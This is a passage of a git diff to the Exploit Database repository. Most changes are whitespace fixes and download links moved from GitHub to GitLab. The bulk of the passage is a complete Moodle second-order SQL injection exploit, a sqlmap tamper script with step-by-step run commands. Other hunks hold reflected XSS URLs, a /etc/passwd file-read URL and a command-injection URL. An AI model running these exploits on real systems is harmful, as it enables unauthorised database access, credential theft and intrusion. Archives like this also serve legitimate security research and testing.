+http://www.example.com/shop/USER_ARTIKEL_HANDLING_AUFRUF.php?darstellen=1\"+onmouseover%3Dalert(411780276689)+&lowlimit=0&highlimit=15&bilderanzeigen=true&Suchstring=111-222-1933email%40address.tst&javascript_enabled=true&PEPPERSESS=d0499c7999470455b75dc23b45e7fb1b&w=1280&h=971 \ No newline at end of file diff --git a/exploits/php/webapps/33987.txt b/exploits/php/webapps/33987.txt index aaff8fc89..2740dcd21 100644 --- a/exploits/php/webapps/33987.txt +++ b/exploits/php/webapps/33987.txt @@ -6,4 +6,4 @@ An attacker may leverage this issue to execute arbitrary script code in the brow PHP Banner Exchange 1.2 is vulnerable; other versions may also be affected. -http://www.example.com/signupconfirm.php?name=indoushkax&login=hacked&pass=exploit&email=indoushka%40hotmail%2E.com&url=http%3A%2F%2F&bannerurl=&submit=%C7%D6%DB%D8%20%E3%D1%C9%20%E6%C7%CD%CF%C9%20%E1%E1%C7%D4%CA%D1%C7%DF +http://www.example.com/signupconfirm.php?name=indoushkax&login=hacked&pass=exploit&email=indoushka%40hotmail%2E.com&url=http%3A%2F%2F&bannerurl=&submit=%C7%D6%DB%D8%20%E3%D1%C9%20%E6%C7%CD%CF%C9%20%E1%E1%C7%D4%CA%D1%C7%DF \ No newline at end of file diff --git a/exploits/php/webapps/34338.html b/exploits/php/webapps/34338.html index 9dd2f30d4..d8ba95903 100644 --- a/exploits/php/webapps/34338.html +++ b/exploits/php/webapps/34338.html @@ -32,4 +32,4 @@ document.getElementById('form_addedit_submit').click(); + \ No newline at end of file diff --git a/exploits/php/webapps/34381.txt b/exploits/php/webapps/34381.txt index c4c2e6bb4..e294d8ee3 100644 --- a/exploits/php/webapps/34381.txt +++ b/exploits/php/webapps/34381.txt @@ -37,4 +37,4 @@ Go to -> Forum Display, for example:localhost/forumdisplay.php?fid=2 Search at the following code "Search this Forum":

') +('2019-09-26 14:25:01.878572', '1')('2019-09-26 15:16:11.013642', '1')('2019-09-26 15:21:52.962785', '

test')('2019-09-26 15:23:50.367709', '') \ No newline at end of file diff --git a/exploits/php/webapps/47553.md b/exploits/php/webapps/47553.md index 342f464cb..1205f999d 100644 --- a/exploits/php/webapps/47553.md +++ b/exploits/php/webapps/47553.md @@ -76,4 +76,4 @@ The buffer underflow in php-fpm is present in PHP version 5. However, this explo Original anomaly discovered by [d90pwn](https://twitter.com/d90pwn) during Real World CTF. Root clause found by me (Emil Lerner) as well as the way to set php.ini options. Final php.ini options set is found by [beched](https://twitter.com/ahack_ru). -EDB Note: Download ~ https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/47553.zip \ No newline at end of file +EDB Note: Download ~ https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/47553.zip \ No newline at end of file diff --git a/exploits/php/webapps/4841.txt b/exploits/php/webapps/4841.txt index 5f3c78043..2eb24c31d 100644 --- a/exploits/php/webapps/4841.txt +++ b/exploits/php/webapps/4841.txt @@ -86,7 +86,7 @@ www.underwater.itdefence.ru/isniff.rar - https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/4841.rar (2008-isniff.rar) + https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/4841.rar (2008-isniff.rar) ----[ FROM RUSSIA WITH LOVE :: underWHAT?! , gemaglabin ] OSVDB: 51280, 51281 diff --git a/exploits/php/webapps/48457.txt b/exploits/php/webapps/48457.txt index e65c72694..5caf84d4b 100644 --- a/exploits/php/webapps/48457.txt +++ b/exploits/php/webapps/48457.txt @@ -37,4 +37,4 @@ Parameter: id (GET) [08:55:01] [INFO] the back-end DBMS is MySQL web server operating system: Linux Ubuntu web application technology: Apache 2.4.29 -back-end DBMS: MySQL >= 5.0.12 +back-end DBMS: MySQL >= 5.0.12 \ No newline at end of file diff --git a/exploits/php/webapps/49606.py b/exploits/php/webapps/49606.py index bcf548eaa..ab8be137f 100755 --- a/exploits/php/webapps/49606.py +++ b/exploits/php/webapps/49606.py @@ -80,4 +80,4 @@ feed =""" """.format(rce) feed_file.write(feed) -feed_file.close() +feed_file.close() \ No newline at end of file diff --git a/exploits/php/webapps/50825.py b/exploits/php/webapps/50825.py index 34ea8b399..19bafde47 100755 --- a/exploits/php/webapps/50825.py +++ b/exploits/php/webapps/50825.py @@ -10,19 +10,19 @@ """ thanks to: - - +     - https://pentest.blog/exploiting-second-order-sqli-flaws-by-using-burp-custom-sqlmap-tamper/ - - +     - https://book.hacktricks.xyz/pentesting-web/sql-injection/sqlmap/second-order-injection-sqlmap - - Miroslav Stampar for maintaining this incredible tool +     - Miroslav Stampar for maintaining this incredible tool greetz to: - - @steventseeley - - @fabiusartrel - - @mpeg4codec - - @0x90shell - - @jkbenaim - - jmp +     - @steventseeley +     - @fabiusartrel +     - @mpeg4codec +     - @0x90shell +     - @jkbenaim +     - jmp """ @@ -44,59 +44,59 @@ Moodle 2.7dev (Build: 20131129) to 3.11.5+ 2nd Order SQLi Exploit by muffin (@mufinnnnnnn) How to use: - 1. Define the variables at the top of the tamper() function, example: - username = "teacher's-username" - password = "teacher's-password" - app_root = "http://127.0.0.1/moodle" - course_id = 3 - NOTE: the course_id should be a course that your teacher can +     1. Define the variables at the top of the tamper() function, example: +             username    = "teacher's-username" +             password    = "teacher's-password" +             app_root    = "http://127.0.0.1/moodle" +             course_id   = 3 +         NOTE: the course_id should be a course that your teacher can create badges on - 2. Create a file called `req.txt` that looks like the following. Be +     2. Create a file called `req.txt` that looks like the following. Be sure to update the `Host:` field... - POST +         POST /moodle/badges/criteria_settings.php?badgeid=badge-id-replace-me&add=1&type=6 HTTP/1.1 - Host: - Content-Type: application/x-www-form-urlencoded - User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) +         Host: +         Content-Type: application/x-www-form-urlencoded +         User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.82 Safari/537.36 - Connection: close +         Connection: close sesskey=sess-key-replace-me&_qf__edit_criteria_form=1&mform_isexpanded_id_first_header=1&mform_isexpanded_id_aggregation=0&mform_isexpanded_id_description_header=0&field_firstname=0&field_lastname=0&field_lastname=*&field_email=0&field_address=0&field_phone1=0&field_phone2=0&field_department=0&field_institution=0&field_description=0&field_picture=0&field_city=0&field_country=0&agg=2&description%5Btext%5D=&description%5Bformat%5D=1&submitbutton=Save - 3. Create a file called `req2.txt` that looks like the following. +     3. Create a file called `req2.txt` that looks like the following. Again, be sure to update the `Host:` field... - POST /moodle/badges/action.php HTTP/1.1 - Host: - Content-Type: application/x-www-form-urlencoded - User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) +         POST /moodle/badges/action.php HTTP/1.1 +         Host: +         Content-Type: application/x-www-form-urlencoded +         User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.82 Safari/537.36 - Connection: close +         Connection: close id=badge-id-replace-me&activate=1&sesskey=sess-key-replace-me&confirm=1&return=%2Fbadges%2Fcriteria.php%3Fid%3Dbadge_id-replace-me - 4. Run the following sqlmap command, make sure the tamper argument +     4. Run the following sqlmap command, make sure the tamper argument is pointing at this file: - sqlmap -r req.txt --second-req req2.txt +         sqlmap -r req.txt --second-req req2.txt --tamper=./moodle-tamper.py --dbms=mysql --level=5 --prefix='id = 1' --drop-set-cookie --answer="login/index.php'. Do you want to follow?=n,Do you want to process it=y" --test-filter='MySQL >= 5.0.12 AND time-based blind (query SLEEP)' --current-user --batch --flush - NOTES: - - for some reason after the first run sqlmap complains that +         NOTES: +             - for some reason after the first run sqlmap complains that it cannot fingerprint - the db and will refuse to try enumerating anthing else, +                 the db and will refuse to try enumerating anthing else, this - is why there is a flush at the end. I'm sure it can be +                 is why there is a flush at the end. I'm sure it can be fixed... - - you can do error based with this command (if errors are +             - you can do error based with this command (if errors are enabled...not likely): - sqlmap -r req.txt --second-req req2.txt +                 sqlmap -r req.txt --second-req req2.txt --tamper=./moodle-tamper.py --dbms=mysql --level=5 --prefix='id = 1' --level=5 --drop-set-cookie --answer="login/index.php'. Do you want to follow?=n,Do you want to process it=y" --batch --current-user @@ -105,384 +105,384 @@ WHERE, HAVING, ORDER BY or GROUP BY clause (GTID_SUBSET)' How it works (briefly): - - In order to get our sql query into the database it's necessary to +     - In order to get our sql query into the database it's necessary to create a - badge and add some criteria. It is when adding the critera that +         badge and add some criteria. It is when adding the critera that the - sql-to-be-executed-2nd-order is inserted into the database. - Finally, when the badge is enabled the injected sql is executed. - - This tamper script does the following: - - log in to the app - - update cookie/sesskey for both the 1st and 2nd requests - - make all the requests necessary to create the badge, right up +         sql-to-be-executed-2nd-order is inserted into the database. +         Finally, when the badge is enabled the injected sql is executed. +     - This tamper script does the following: +         - log in to the app +         - update cookie/sesskey for both the 1st and 2nd requests +         - make all the requests necessary to create the badge, right up until adding the critera - - sqlmap itself adds the criteria with whatever payload it's testing - - sqlmap makes the 2nd call to enable the badge (runs the injected sql) - - next time around the tamper script will delete the badge that it last - created to prevent have 10000s of badges for the course +     - sqlmap itself adds the criteria with whatever payload it's testing +     - sqlmap makes the 2nd call to enable the badge (runs the injected sql) +     - next time around the tamper script will delete the badge that it last +         created to prevent have 10000s of badges for the course Analysis of the bug: - - see http://muffsec.com/blog/moodle-2nd-order-sqli/ +     - see http://muffsec.com/blog/moodle-2nd-order-sqli/ Why?: - 1. It's an interesting bug, 2nd order sqli is more rare (or maybe +     1. It's an interesting bug, 2nd order sqli is more rare (or maybe just harder to find?) - 2. It's an interesting use of sqlmap. There are some articles +     2. It's an interesting use of sqlmap. There are some articles talking about using it for 2nd order sqli - but the use cases outlined are relatively straightforward. +         but the use cases outlined are relatively straightforward. There's a few hacky things being done - with sqlmap in this script which others might want to do some +         with sqlmap in this script which others might want to do some day i.e. - - using the tamper script to authenticate to the app - - updating the Cookie in sqlmap's httpHeader structure - - updating the CSRF token (sesskey) in the body of both the +             - using the tamper script to authenticate to the app +             - updating the Cookie in sqlmap's httpHeader structure +             - updating the CSRF token (sesskey) in the body of both the 1st and 2nd request - 3. I wanted to practice programming/thought it would be fun. Also I +     3. I wanted to practice programming/thought it would be fun. Also I didn't want to reinvent the - wheel with a standalone exploit when sqlmap is just so darn +         wheel with a standalone exploit when sqlmap is just so darn good at what it does. Thoughts: - - The exploit is not optimized, halfway through writing I realized +     - The exploit is not optimized, halfway through writing I realized there is a badge - duplication feature which would cut the number of requests +         duplication feature which would cut the number of requests generated down significantly. - There's probably many other ways it could be improved as well - - I didn't do much testing...it works on my system... - - I would be surprised if anyone ever put a `Teacher` level sqli to +         There's probably many other ways it could be improved as well +     - I didn't do much testing...it works on my system... +     - I would be surprised if anyone ever put a `Teacher` level sqli to practical use - - As a bonus, this bug is also usable as a stored xss - - Would be cool if moodle's bug bounty paid more than kudos +     - As a bonus, this bug is also usable as a stored xss +     - Would be cool if moodle's bug bounty paid more than kudos """ def get_user_session(username, password, app_root): - """ - - logs in to moodle - - returns session object, cookie, and sesskey - """ +     """ +     - logs in to moodle +     - returns session object, cookie, and sesskey +     """ - s = requests.Session() - login_page = "{app_root}/login/index.php".format(app_root=app_root) +     s = requests.Session() +     login_page = "{app_root}/login/index.php".format(app_root=app_root) - # make first GET request to get cookie and logintoken - r = s.get(login_page, verify=False) +     # make first GET request to get cookie and logintoken +     r = s.get(login_page, verify=False) - try: - token = re.findall('logintoken" value="(.*?)"', r.text)[0] - except Exception as e: - print("[-] did not find logintoken, is the target correct?") - print(e) - sys.exit(1) +     try: +         token = re.findall('logintoken" value="(.*?)"', r.text)[0] +     except Exception as e: +         print("[-] did not find logintoken, is the target correct?") +         print(e) +         sys.exit(1) - payload = {'username': username, 'password': password, 'anchor': +     payload = {'username': username, 'password': password, 'anchor': '', 'logintoken': token} - # make second request to actually log in - # also let's us get the sesskey - r = s.post(login_page, data=payload, allow_redirects=False, +     # make second request to actually log in +     # also let's us get the sesskey +     r = s.post(login_page, data=payload, allow_redirects=False, verify=False) - # third request for session test which activates the session - cookie = r.cookies.get_dict() - r = s.get(r.headers['Location'], verify=False) +     # third request for session test which activates the session +     cookie = r.cookies.get_dict() +     r = s.get(r.headers['Location'], verify=False) - sesskey = re.findall('sesskey":"(.*?)"', r.text)[0] +     sesskey = re.findall('sesskey":"(.*?)"', r.text)[0] - if (len(cookie) == 0): - sys.exit("[-] Could not establish session! Are credz correct?") +     if (len(cookie) == 0): +         sys.exit("[-] Could not establish session! Are credz correct?") - print("[+] Cookie: {} for user \"{}\"".format(cookie, username)) - print("[+] sesskey: {} for user \"{}\"".format(sesskey, username)) +     print("[+] Cookie: {} for user \"{}\"".format(cookie, username)) +     print("[+] sesskey: {} for user \"{}\"".format(sesskey, username)) - return s, cookie, sesskey +     return s, cookie, sesskey def new_badge1(s, sesskey, app_root, course_id): - """ - - this is the first request that gets generated when "add a new badge" - is clicked. - - it returns the `client_id`, `itemid`, and `ctx_id` which are +     """ +     - this is the first request that gets generated when "add a new badge" +     is clicked. +     - it returns the `client_id`, `itemid`, and `ctx_id` which are needed on subsequent requests - - returns -1 on failure - """ - target_url = "{app_root}/badges/newbadge.php".format(app_root=app_root) +     - returns -1 on failure +     """ +     target_url = "{app_root}/badges/newbadge.php".format(app_root=app_root) - # badge type is 2 which is a course badge (rather than a site badge) - payload = {'type': 2, 'id': course_id, 'sesskey': sesskey} +     # badge type is 2 which is a course badge (rather than a site badge) +     payload = {'type': 2, 'id': course_id, 'sesskey': sesskey} - r = s.post(target_url, data=payload, allow_redirects=False, +     r = s.post(target_url, data=payload, allow_redirects=False, verify=False) - try: - client_id = re.findall('"client_id":"(.*?)"', r.text)[0] - except Exception as e: - print("[-] failed to grab client_id in new_badge1()") - print(e) - return -1 +     try: +         client_id = re.findall('"client_id":"(.*?)"', r.text)[0] +     except Exception as e: +         print("[-] failed to grab client_id in new_badge1()") +         print(e) +         return -1 - try: - itemid = re.findall('"itemid":(.*?),"', r.text)[0] - except Exception as e: - print("[-] failed to grab itemid in new_badge1()") - print(e) - return -1 +     try: +         itemid = re.findall('"itemid":(.*?),"', r.text)[0] +     except Exception as e: +         print("[-] failed to grab itemid in new_badge1()") +         print(e) +         return -1 - try: - ctx_id = re.findall('&ctx_id=(.*?)&', r.text)[0] - except Exception as e: - print("[-] failed to grab ctx_id in new_badge1()") - print(e) - return -1 +     try: +         ctx_id = re.findall('&ctx_id=(.*?)&', r.text)[0] +     except Exception as e: +         print("[-] failed to grab ctx_id in new_badge1()") +         print(e) +         return -1 - return client_id, itemid, ctx_id +     return client_id, itemid, ctx_id def image_signin(s, sesskey, app_root, client_id, itemid, ctx_id): - """ - - sadly, in order to create a badge we have to associate an image - - this request adds an image which is a moodle logo from wikimedia - - returns sourcekey on success - - return -1 on failure - """ +     """ +     - sadly, in order to create a badge we have to associate an image +     - this request adds an image which is a moodle logo from wikimedia +     - returns sourcekey on success +     - return -1 on failure +     """ - target_url = +     target_url = "{app_root}/repository/repository_ajax.php?action=signin".format(app_root=app_root) - # repo id 6 is for when we are downloading an image - payload = {'file': +     # repo id 6 is for when we are downloading an image +     payload = {'file': 'https://upload.wikimedia.org/wikipedia/commons/thumb/c/c6/Moodle-logo.svg/512px-Moodle-logo.svg.png', - 'repo_id': '6', 'p': '', 'page': '', 'env': 'filepicker', +         'repo_id': '6', 'p': '', 'page': '', 'env': 'filepicker', 'accepted_types[]': '.gif', 'accepted_types[]': '.jpe', - 'accepted_types[]': '.jpeg', 'accepted_types[]': '.jpg', +         'accepted_types[]': '.jpeg', 'accepted_types[]': '.jpg', 'accepted_types[]': '.png', 'sesskey': sesskey, - 'client_id': client_id, 'itemid': itemid, 'maxbytes': '262144', +         'client_id': client_id, 'itemid': itemid, 'maxbytes': '262144', 'areamaxbytes': '-1', 'ctx_id': ctx_id} - r = s.post(target_url, data=payload, allow_redirects=False, +     r = s.post(target_url, data=payload, allow_redirects=False, verify=False) - try: - sourcekey = re.findall('"sourcekey":"(.*?)","', r.text)[0] - except Exception as e: - print("[-] failed to grab sourcekey in image_signin()") - print(e) - return -1 +     try: +         sourcekey = re.findall('"sourcekey":"(.*?)","', r.text)[0] +     except Exception as e: +         print("[-] failed to grab sourcekey in image_signin()") +         print(e) +         return -1 - return sourcekey +     return sourcekey def image_download(s, sesskey, app_root, client_id, itemid, ctx_id, sourcekey): - """ - - continues the image flow started in image_signin(), here the +     """ +     - continues the image flow started in image_signin(), here the actual download happens - - returns image_id on success - - return -1 on failure - """ +     - returns image_id on success +     - return -1 on failure +     """ - target_url = +     target_url = "{app_root}/repository/repository_ajax.php?action=download".format(app_root=app_root) - # repo id 6 is for when we are downloading from an image from a URL - payload = {'repo_id': '6', 'p': '', 'page': '', 'env': +     # repo id 6 is for when we are downloading from an image from a URL +     payload = {'repo_id': '6', 'p': '', 'page': '', 'env': 'filepicker', 'accepted_types[]': '.gif', 'accepted_types[]': '.jpe', - 'accepted_types[]': '.jpeg', 'accepted_types[]': '.jpg', +         'accepted_types[]': '.jpeg', 'accepted_types[]': '.jpg', 'accepted_types[]': '.png', 'sesskey': sesskey, - 'client_id': client_id, 'itemid': itemid, 'maxbytes': '262144', +         'client_id': client_id, 'itemid': itemid, 'maxbytes': '262144', 'areamaxbytes': '-1', 'ctx_id': ctx_id, - 'title': '512px-Moodle-logo.svg.png', - 'source': +         'title': '512px-Moodle-logo.svg.png', +         'source': 'https://upload.wikimedia.org/wikipedia/commons/thumb/c/c6/Moodle-logo.svg/512px-Moodle-logo.svg.png', - 'savepath': '/', 'sourcekey': sourcekey, 'license': 'unknown', +         'savepath': '/', 'sourcekey': sourcekey, 'license': 'unknown', 'author': 'moodle-hax'} - r = s.post(target_url, data=payload, allow_redirects=False, +     r = s.post(target_url, data=payload, allow_redirects=False, verify=False) - try: - image_id = re.findall(',"id":(.*?),"file', r.text)[0] - except Exception as e: - print("[-] failed to grab image_id in image_download()") - print(e) - return -1 +     try: +         image_id = re.findall(',"id":(.*?),"file', r.text)[0] +     except Exception as e: +         print("[-] failed to grab image_id in image_download()") +         print(e) +         return -1 - return image_id +     return image_id def new_badge2(s, sesskey, app_root, course_id, image_id, name="sqlmap-badge", description="sqlmap-description"): - """ - - finally we are actually creating the badge - """ - target_url = "{app_root}/badges/newbadge.php".format(app_root=app_root) +     """ +     - finally we are actually creating the badge +     """ +     target_url = "{app_root}/badges/newbadge.php".format(app_root=app_root) - # badge type is 2 which is a course badge (rather than a site badge) - payload = {'type': '2', 'id': course_id, 'action': 'new', +     # badge type is 2 which is a course badge (rather than a site badge) +     payload = {'type': '2', 'id': course_id, 'action': 'new', 'sesskey': sesskey, - '_qf__core_badges_form_badge': '1', +         '_qf__core_badges_form_badge': '1', 'mform_isexpanded_id_badgedetails': '1', - 'mform_isexpanded_id_issuancedetails': '1', 'name': name, +         'mform_isexpanded_id_issuancedetails': '1', 'name': name, 'version': '', - 'language': 'en', 'description': description, 'image': image_id, - 'imageauthorname': '', 'imageauthoremail': '', +         'language': 'en', 'description': description, 'image': image_id, +         'imageauthorname': '', 'imageauthoremail': '', 'imageauthorurl': '', - 'imagecaption': '', 'expiry': '0', 'submitbutton': 'Create+badge'} +         'imagecaption': '', 'expiry': '0', 'submitbutton': 'Create+badge'} - r = s.post(target_url, data=payload, allow_redirects=False, +     r = s.post(target_url, data=payload, allow_redirects=False, verify=False) - try: - badge_id = re.findall('badges/criteria.php\?id=(.*?)"', r.text)[0] - except Exception as e: - #print("[-] failed to grab badge_id in new_badge2()") - #print(e) - return -1 +     try: +         badge_id = re.findall('badges/criteria.php\?id=(.*?)"', r.text)[0] +     except Exception as e: +         #print("[-] failed to grab badge_id in new_badge2()") +         #print(e) +         return -1 - return badge_id +     return badge_id def delete_badge(s, sesskey, app_root, course_id, badge_id): - """ - - delete the badge - """ - target_url = "{app_root}/badges/index.php".format(app_root=app_root) +     """ +     - delete the badge +     """ +     target_url = "{app_root}/badges/index.php".format(app_root=app_root) - # badge type is 2 which is a course badge (rather than a site badge) - payload = {'sort': 'name', 'dir': 'ASC', 'page': '0', 'type': '2', - 'id': course_id, 'delete': badge_id, 'confirm': '1', +     # badge type is 2 which is a course badge (rather than a site badge) +     payload =  {'sort': 'name', 'dir': 'ASC', 'page': '0', 'type': '2', +                 'id': course_id, 'delete': badge_id, 'confirm': '1', 'sesskey': sesskey} - # TODO: add validation logic - r = s.post(target_url, data=payload, allow_redirects=False, +     # TODO: add validation logic +     r = s.post(target_url, data=payload, allow_redirects=False, verify=False) def tamper(payload, **kwargs): - username = "teacher" - password = "password" - app_root = "http://127.0.0.1/moodle" - course_id = 3 +     username  = "teacher" +     password  = "password" +     app_root  = "http://127.0.0.1/moodle" +     course_id = 3 - # check if cookie is set - # cookie should not be set in the request file or this script will fail - # +     # check if cookie is set +     # cookie should not be set in the request file or this script will fail +     # https://stackoverflow.com/questions/946860/using-pythons-list-index-method-on-a-list-of-tuples-or-objects - try: - cookie_index = [x[0] for x in conf.httpHeaders].index('Cookie') - except ValueError: - # if no cookie is found we run the session initialization routine - s, cookie, sesskey = get_user_session(username, password, app_root) +     try: +         cookie_index = [x[0] for x in conf.httpHeaders].index('Cookie') +     except ValueError: +         # if no cookie is found we run the session initialization routine +         s, cookie, sesskey = get_user_session(username, password, app_root) - # this updates the sqlmap cookie - conf.httpHeaders.append(('Cookie', +         # this updates the sqlmap cookie +         conf.httpHeaders.append(('Cookie', 'MoodleSession={}'.format(cookie['MoodleSession']))) - # here we're making our own global variable to hold the sesskey +         # here we're making our own global variable to hold the sesskey and session object - conf.sesskey = sesskey - conf.s = s +         conf.sesskey = sesskey +         conf.s = s - # check if a badge_id is set, if so delete it before making the new one - try: - conf.badge_id is None - delete_badge(conf.s, conf.sesskey, app_root, course_id, +     # check if a badge_id is set, if so delete it before making the new one +     try: +         conf.badge_id is None +         delete_badge(conf.s, conf.sesskey, app_root, course_id, conf.badge_id) - except AttributeError: - # we should only hit this on the very first run - # we hit the AttributeError because conf.badge_id doesn't exist yet - pass +     except AttributeError: +         # we should only hit this on the very first run +         # we hit the AttributeError because conf.badge_id doesn't exist yet +         pass - # - ## do all the badge creation flow up the point of adding the criteria - # - client_id, itemid, ctx_id = new_badge1(conf.s, conf.sesskey, +     # +     ## do all the badge creation flow up the point of adding the criteria +     # +     client_id, itemid, ctx_id = new_badge1(conf.s, conf.sesskey, app_root, course_id) - sourcekey = image_signin(conf.s, conf.sesskey, app_root, client_id, +     sourcekey = image_signin(conf.s, conf.sesskey, app_root, client_id, itemid, ctx_id) - image_id = image_download(conf.s, conf.sesskey, app_root, +     image_id  = image_download(conf.s, conf.sesskey, app_root, client_id, itemid, ctx_id, sourcekey) - # we need to store the badge_id globally - conf.badge_id = new_badge2(conf.s, conf.sesskey, app_root, +     # we need to store the badge_id globally +     conf.badge_id = new_badge2(conf.s, conf.sesskey, app_root, course_id, image_id) - # - if badge creation failed try deleting the last known badgeid - # - it's most likely failing because a badge already exists with +     # - if badge creation failed try deleting the last known badgeid +     # - it's most likely failing because a badge already exists with the same name - # - yes, it's ugly - # - if you control+c and there is a badge with some BS criteria you +     # - yes, it's ugly +     # - if you control+c and there is a badge with some BS criteria you will - # only see an error on the badge management page and won't be - # able to delete it through moodle - # - if the trouble badgeid is known it can be deleted to resolve +     #       only see an error on the badge management page and won't be +     #       able to delete it through moodle +     # - if the trouble badgeid is known it can be deleted to resolve the issue - if (conf.badge_id == -1): - with open("/tmp/last-known-badge-id", "r") as f: - conf.badge_id = f.read() - delete_badge(conf.s, conf.sesskey, app_root, course_id, +     if (conf.badge_id == -1): +         with open("/tmp/last-known-badge-id", "r") as f: +             conf.badge_id = f.read() +         delete_badge(conf.s, conf.sesskey, app_root, course_id, conf.badge_id) - conf.badge_id = new_badge2(conf.s, conf.sesskey, app_root, +         conf.badge_id = new_badge2(conf.s, conf.sesskey, app_root, course_id, image_id) - if (conf.badge_id == -1): - sys.exit("[-] ya done fucked up...") +         if (conf.badge_id == -1): +             sys.exit("[-] ya done fucked up...") - with open("/tmp/last-known-badge-id", "w") as f: - f.write(conf.badge_id) +     with open("/tmp/last-known-badge-id", "w") as f: +         f.write(conf.badge_id) - # - update the sesskey and badge_id in the body of the requests - # - it seems necessary to update both the conf.parameters and +     # - update the sesskey and badge_id in the body of the requests +     # - it seems necessary to update both the conf.parameters and conf.paramDict structures - post = +     post = ("sesskey={sesskey}&_qf__edit_criteria_form=1&mform_isexpanded_id_first_header=1&" "mform_isexpanded_id_aggregation=0&mform_isexpanded_id_description_header=0&field_firstname=0&" "field_lastname=0&field_lastname=*&field_email=0&field_address=0&field_phone1=0&field_phone2=0&" "field_department=0&field_institution=0&field_description=0&field_picture=0&field_city=0&" "field_country=0&agg=2&description[text]=&description[format]=1&submitbutton=Save".format(sesskey=conf.sesskey)) - get = "badgeid={badge_id}&add=1&type=6".format(badge_id=conf.badge_id) +     get  = "badgeid={badge_id}&add=1&type=6".format(badge_id=conf.badge_id) - conf.parameters = {'(custom) POST': post, - 'GET': get, - 'Host': conf.parameters['Host'], - 'Referer': conf.parameters['Referer'], - 'User-Agent': conf.parameters['User-Agent']} +     conf.parameters = {'(custom) POST': post, +                 'GET': get, +                 'Host': conf.parameters['Host'], +                 'Referer': conf.parameters['Referer'], +                 'User-Agent': conf.parameters['User-Agent']} - conf.paramDict = {'(custom) POST': OrderedDict([('#1*', post)]), - 'GET': OrderedDict([('badgeid', conf.badge_id), - ('add', '1'), - ('type', '6')]), - 'Host': {'Host': conf.parameters['Host']}, - 'Referer': {'Referer': +     conf.paramDict = {'(custom) POST': OrderedDict([('#1*', post)]), +                'GET': OrderedDict([('badgeid', conf.badge_id), +                                    ('add', '1'), +                                    ('type', '6')]), +                'Host': {'Host': conf.parameters['Host']}, +                'Referer': {'Referer': '{app_root}/badges/criteria_settings.php'.format(app_root=app_root)}, - 'User-Agent': {'User-Agent': 'Mozilla/5.0 (Windows NT +                'User-Agent': {'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 ' - '(KHTML, like Gecko) +                                             '(KHTML, like Gecko) Chrome/98.0.4758.82 Safari/537.36'}} - # we need to update values for the second request too - secondReq_url = ("id={badge_id}&activate=1&sesskey={sesskey}&" +     # we need to update values for the second request too +     secondReq_url = ("id={badge_id}&activate=1&sesskey={sesskey}&" "confirm=1&return=/badges/criteria.php?id={badge_id}".format(badge_id=conf.badge_id, sesskey=conf.sesskey)) - kb['secondReq'] = +     kb['secondReq'] = ('{app_root}/badges/action.php'.format(app_root=app_root), 'POST', - secondReq_url, None, - (('Host', app_root.split('/')[2]), - ('Content-Type', 'application/x-www-form-urlencoded'), - ('Cookie', +         secondReq_url, None, +         (('Host', app_root.split('/')[2]), +         ('Content-Type', 'application/x-www-form-urlencoded'), +         ('Cookie', 'MoodleSession={}'.format(conf.s.cookies.get_dict()['MoodleSession'])), # yes, ugly - ('User-Agent', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) +         ('User-Agent', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36' - ' (KHTML, like Gecko) Chrome/98.0.4758.82 Safari/537.36'))) +         ' (KHTML, like Gecko) Chrome/98.0.4758.82 Safari/537.36'))) - return payload \ No newline at end of file +     return payload \ No newline at end of file diff --git a/exploits/php/webapps/6733.txt b/exploits/php/webapps/6733.txt index 7213168d8..376a8ecd5 100644 --- a/exploits/php/webapps/6733.txt +++ b/exploits/php/webapps/6733.txt @@ -15,4 +15,4 @@ http://localhost/mini-pub.php/front-end/cat.php?sFileName=/etc/passwd 3. command execution http://localhost/mini-pub.php/front-end/cat.php?sFileName=a%3Benv -# milw0rm.com [2008-10-12] +# milw0rm.com [2008-10-12] \ No newline at end of file diff --git a/exploits/php/webapps/697.c b/exploits/php/webapps/697.c index 567ddde98..82c236893 100644 --- a/exploits/php/webapps/697.c +++ b/exploits/php/webapps/697.c @@ -1,4 +1,4 @@ -// Compiled version: https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/697.rar (phpbbmemorydump.rar) +// Compiled version: https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/697.rar (phpbbmemorydump.rar) // Source serv.cpp is at the bottom of the page - str0ke // Notes from author: diff --git a/exploits/php/webapps/7421.txt b/exploits/php/webapps/7421.txt index 9b13d731c..bcdad202c 100644 --- a/exploits/php/webapps/7421.txt +++ b/exploits/php/webapps/7421.txt @@ -21,6 +21,6 @@ [+] For OS Commanding executing go to: http://127.0.0.1/ezinfo/about?cmd= */ -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/7421.zip (2008-eZPublish_abuse_of_functionality_zero_day.zip) +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/7421.zip (2008-eZPublish_abuse_of_functionality_zero_day.zip) # milw0rm.com [2008-12-11] \ No newline at end of file diff --git a/exploits/php/webapps/897.cpp b/exploits/php/webapps/897.cpp index 3cfc2a5a0..4356dce90 100644 --- a/exploits/php/webapps/897.cpp +++ b/exploits/php/webapps/897.cpp @@ -1,5 +1,5 @@ /* Paisterist's code was nice but heres mil's version. - * precompiled: https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/897.rar + * precompiled: https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/897.rar * Usage: * bcc32 897.cpp * and place the exe in your firefox profile dir. diff --git a/exploits/php/webapps/9835.txt b/exploits/php/webapps/9835.txt index 6c54a8e9f..044cf71fd 100644 --- a/exploits/php/webapps/9835.txt +++ b/exploits/php/webapps/9835.txt @@ -27,6 +27,4 @@ #=========================================================== ################################################################# # Securitylab Security Research Team 